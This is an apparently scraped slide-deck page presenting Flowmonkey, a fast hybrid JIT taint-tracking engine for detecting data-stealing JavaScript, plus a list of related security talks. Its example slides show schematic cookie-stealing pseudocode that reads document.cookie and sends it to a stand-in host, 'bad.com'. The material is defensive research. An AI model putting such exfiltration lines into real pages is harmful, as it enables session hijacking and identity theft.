document.cookie Identity Theft ✗ Cookie Stealing.

Slides:

Advertisements

Similar presentations

Analyzing Information Flow in JavaScript-based Browser Extensions Mohan Dhawan and Vinod Ganapathy Department of Computer Science Rutgers University 25.

Advertisements

JavaScript FaaDoOEngineers.com FaaDoOEngineers.com.

The Case for JavaScript Transactions Mohan Dhawan, Chung-chieh Shan, Vinod Ganapathy Department of Computer Science Rutgers University PLAS 2010.

Code Injection Attacks on HTML5-based Mobile Apps: Characterization, Detection and Mitigation Xing Jin, Xunchao Hu, Kailiang Ying, Wenliang Du, Heng Yin,

Compiler Optimized Dynamic Taint Analysis James Kasten Alex Crowell.

GATEKEEPER MOSTLY STATIC ENFORCEMENT OF SECURITY AND RELIABILITY PROPERTIES FOR JAVASCRIPT CODE Salvatore Guarnieri & Benjamin Livshits Presented by Michael.

WEB BROWSER SECURITY By Robert Sellers Brian Bauer.

Analyzing Information Flow in JavaScript-based Browser Extensions Mohan Dhawan and Vinod Ganapathy Department of Computer Science Rutgers University.

Dec 5, 2007University of Virginia1 Efficient Dynamic Tainting using Multiple Cores Yan Huang University of Virginia Dec

By Philipp Vogt, Florian Nentwich, Nenad Jovanovic, Engin Kirda, Christopher Kruegel, and Giovanni Vigna Network and Distributed System Security(NDSS ‘07)

Securing Interaction for Sites, Apps and Extensions in the Browser Brad Miller J. D. Tygar.

IFC Inside: Retrofitting Languages with Dynamic Information Flow Control Stefan Heule, Deian Stefan, Edward Z. Yang, John C. Mitchell, Alejandro Russo.

ReferencesReferences DiscussionDiscussion Vulnerability Example: SQL injection Auditing Tool for Eclipse LAPSE: a Security Auditing Tool for Eclipse IntroductionIntroductionResultsResults.

1 Enforcing Confidentiality in Low-level Programs Andrew Myers Cornell University.

HTML Recall that HTML is static in that it describes how a page is to be displayed, but it doesn’t provide for interaction or animation. A page created.

1 Document Structure Integrity: A Robust Basis for Cross-Site Scripting Defense Prateek Saxena UC Berkeley Yacin Nadji Illinois Institute Of Technology.

Staged Information Flow for JavaScript Ravi Chugh, Jeff Meister, Ranjit Jhala, Sorin Lerner UC San Diego.

XP Tutorial 9 New Perspectives on JavaScript, Comprehensive1 Working with Cookies Managing Data in a Web Site Using JavaScript Cookies.

1 RAKSHA: A FLEXIBLE ARCHITECTURE FOR SOFTWARE SECURITY Computer Systems Laboratory Stanford University Hari Kannan, Michael Dalton, Christos Kozyrakis.

Lab 3 Cookie Stealing using XSS Kara James, Chelsea Collins, Trevor Norwood, David Johnson.

DYNAMIC DATA TAINTING AND ANALYSIS. Roadmap  Background  TaintDroid  JavaScript  Conclusion.

Phu H. Phung Chalmers University of Technology JSTools’ 12 June 13, 2012, Beijing, China Joint work with Lieven Desmet (KU Leuven)

NDSS 2007 Philipp Vogt, Florian Nentwich, Nenad Jovanovic, Engin Kirda, Christopher Kruegel, Giovanni Vigna.

NMED 3850 A Advanced Online Design January 26, 2010 V. Mahadevan.

Project Proposal Interface Design Website Coding Website Testing & Launching Website Maintenance.

PRECIP: Towards Practical and Retrofittable Confidential Information Protection XiaoFeng Wang (IUB), Zhuowei Li (IUB), Ninghui Li (Purdue) and Jong Youl.

JIT in webkit. What’s JIT See time_compilation for more info. time_compilation.

Saving the World Wide Web from Vulnerable JavaScript International Symposium on Software Testing and Analysis (ISSTA 2011) Omer Tripp IBM Software Group.

1 Accelerated Web Development Course JavaScript and Client side programming Day 2 Rich Roth On The Net

document.location ✗ Location Hijacking Phishing.

CSC-682 Cryptography & Computer Security Sound and Precise Analysis of Web Applications for Injection Vulnerabilities Pompi Rotaru Based on an article.

FireBug. What is Firebug?  Firebug is a powerful tool that allows you to edit HTML, CSS and view the coding behind any website: CSS, HTML, DOM and JavaScript.

By Sean Rose and Erik Hazzard.  SQL Injection is a technique that exploits security weaknesses of the database layer of an application in order to gain.

JavaScript Syntax, how to use it in a HTML document

Lecture 16 Page 1 CS 236 Online Web Security CS 236 On-Line MS Program Networks and Systems Security Peter Reiher.

Yair Grindlinger, CEO and Co-Founder Do you know who your employees are sharing their credentials with? Do they?

By Davide Balzarotti Marco Cova Viktoria V. FelmetsgerGiovanni Vigna Presented by: Mostafa Saad.

University of Central Florida The Postman Always Rings Twice: Attacking & Defending postMessage in HTML5 Websites Ankur Verma University of Central Florida,

An Analysis of the Mozilla Jetpack Extension Framework Rezwana Karim, Mohan Dhawan, Vinod Ganapathy Computer Science, Rutgers University Chung-cheih Shan.

Safe browsing - is an ad-blocker extension enough? AIMILIOS TSOUVELEKAKIS IT-DI-CSO IT LIGHTNING TALK – 12/

CS526Topic 12: Web Security (2)1 Information Security CS 526 Topic 9 Web Security Part 2.

Michael Dalton, Christos Kozyrakis, and Nickolai Zeldovich MIT, Stanford University USENIX 09’ Nemesis: Preventing Authentication & Access Control Vulnerabilities.

Making dynamic pages with javascript Lecture 1. Java script java versus javascript Javascript is a scripting language that will allow you to add real.

1 Isolating Web Programs in Modern Browser Architectures CS6204: Cloud Environment Spring 2011.

Introduction Program File Authorization Security Theorem Active Code Authorization Authorization Logic Implementation considerations Conclusion.

Javascript Static Code Analyzer

© 2011 IBM Corporation Hybrid Analysis for JavaScript Security Assessment Omer Tripp Omri Weisman Salvatore Guarnieri IBM Software Group Sep 2011.

JavaScript Dynamic Active Web Pages Client Side Scripting.

CSRF Attacks Daniel Chen 11/18/15. What is CSRF?  Cross Site Request Forgery (Sea-Surf)  AKA XSRF/ One Click / Sidejacking / Session Riding  Exploits.

1 Utkarsha MishraCOMPSCI 725 David Silver, Suman Jana, Eric Chen, Collin Jackson, and Dan Boneh. “Password Managers: Attacks and Defenses.” In Proceedings.

Unit 2 Assignment 1. Spyware Spyware is a software that gathers information about a person or site and uses it without you knowing. It can send your information.

String Analysis for JavaScript Programs Serena KingDr.Lu Yves Engelmann.

Web Analytics Fundamentals Presented by Tejaswi, Chandrika, Sunil.

Static Checking of Dynamically-Varying Security Policies in Database-Backed Applications Adam Chlipala OSDI 2010.

Web Security (cont.) 1. Referral issues r HTTP referer (originally referrer) – HTTP header that designates calling resource  Page on which a link is.

Web Application Vulnerabilities, Detection Mechanisms, and Defenses

Automatic Web Security Unit Testing: XSS Vulnerability Detection Mahmoud Mohammadi, Bill Chu, Heather Richter, Emerson Murphy-Hill Presenter:

Do you know who your employees are sharing their credentials with

Active Server Pages Computer Science 40S.

Static Detection of Cross-Site Scripting Vulnerabilities

TaintART: A Practical Multi-level Information-Flow Tracking System for Android RunTime Sadiq Basha.

Quantifying the Fingerprintability of Browser Extensions

Static Checking of Dynamically-Varying Security Policies in Database-Backed Applications Adam Chlipala OSDI 2010.

Taint tracking Suman Jana.

Automatic and Precise Client-Side Protection against CSRF Attacks

Riding Someone Else’s Wave with CSRF

All You Ever Wanted to Know About Dynamic Taint Analysis & Forward Symbolic Execution (but might have been afraid to ask) Edward J. Schwartz, Thanassis.

Unit 6 part 3 Test Javascript Test.

Exploring DOM-Based Cross Site Attacks

Presentation transcript:

document.cookie Identity Theft ✗ Cookie Stealing

Password Credit card # Browsing history

Epidemic of Data Stealing JavaScript!

How to Detect Data Stealing? Without Sacrificing Performance?

Motivation Dynamic Taint Tracking Flowmonkey Future Work&Conclusion

Dynamic Taint Tracking Tracks where a value goes at runtime

Dynamic Taint Tracking 1. Tag a value with a taint 2. Propagate taints with the value 3. Block taints from untrusted sinks

Example:Cookie Stealing ck = document.cookie data = tmp + ck; send(“bad.com”, data);

Example:Cookie Stealing Inject Taints (At confidential sources) ck = document.cookie data = tmp + ck; send(“bad.com”, data ); document.cookie;

Example:Cookie Stealing Propagate Taints (At assignments, etc) ck = document.cookie; data = tmp + ck; send(“bad.com”, data ); ck ck;tmp + data

ck = document.cookie; data = tmp + ck; send(“bad.com”, data ); Example:Cookie Stealing Block Taints (At untrusted sinks) “cr=” + color send(“bad.com”, data );

Dynamic Taint Tracking:Policies Cookie Protection cookie send() Password Protection password send() ✗ ✗ General Policy secret info expression ✗

Dynamic Taint Tracking:JS Cross site scripting prevention with dynamic data tainting and static analysis, NDSS'07 Analyzing information flow in JavaScript-based browser extensions, ACSAC'09 An Empirical Study of Privacy-Violating Information Flows in JavaScript Web Applications, CCS'10 10~100x slowdown

Goal: Make It Fast

Motivation Dynamic Taint Tracking Flowmonkey Future Work&Conclusion

InterpreterJIT Engine Source code Based on Jaegermonkey Modification M Taint tracking logic is augmented

Language Extensions __taint(val, t) val: a value to be tainted t : a taint to be used

Language Extensions __taintof(val) returns the taint of val

Language Extensions var secret = __taint(34349, 1); tmp = secret * 68; tmp2 = tmp + “345”; tmp3 = parseInt(tmp2); alert(__taintof(tmp)); // 1 is printed

Implementation: Shadow Stack s * 6 push s //s=5 push 6 mul ’s taint s’ taintJoined taint Real Stack Shadow Stack

Implementation: Shadow Property a.fld = secret a fld… fld‘s taint… Real Properties Shadow Properties

Hybrid Approach Full-fledged Taint Tracking Interpreter Taint Detecting JIT Engine

Hybrid Approach Full-fledged Taint Tracking Interpreter Taint Detecting JIT Engine If it doesn’t touch a taint

Hybrid Approach Full-fledged Taint Tracking Interpreter Taint Detecting JIT Engine Taint detected!! Do full-fledged taint tracking

Hybrid Approach Rapid prototyping Fast with few taints Slow with many taints

Performance: Baseline Sunspider cookie doesn’t flow to 3 rd party code

Performance: Cookie Tracking Sunspider cookie doesn’t flow to 3 rd party code

Demo

Motivation Dynamic Taint Tracking Flowmonkey Future Work&Conclusion

Future Work Missing Flows Implicit Flows, Timing Channel, etc Empirical Study To prove the usability of taint tracking

Conclusions A Fast Hybrid Taint Tracking Engine First JIT-enabled taint tracking engine Still Many Missing Parts Possible to make it a protection tool? Can we sacrifice some performance?

Resources

Thank you!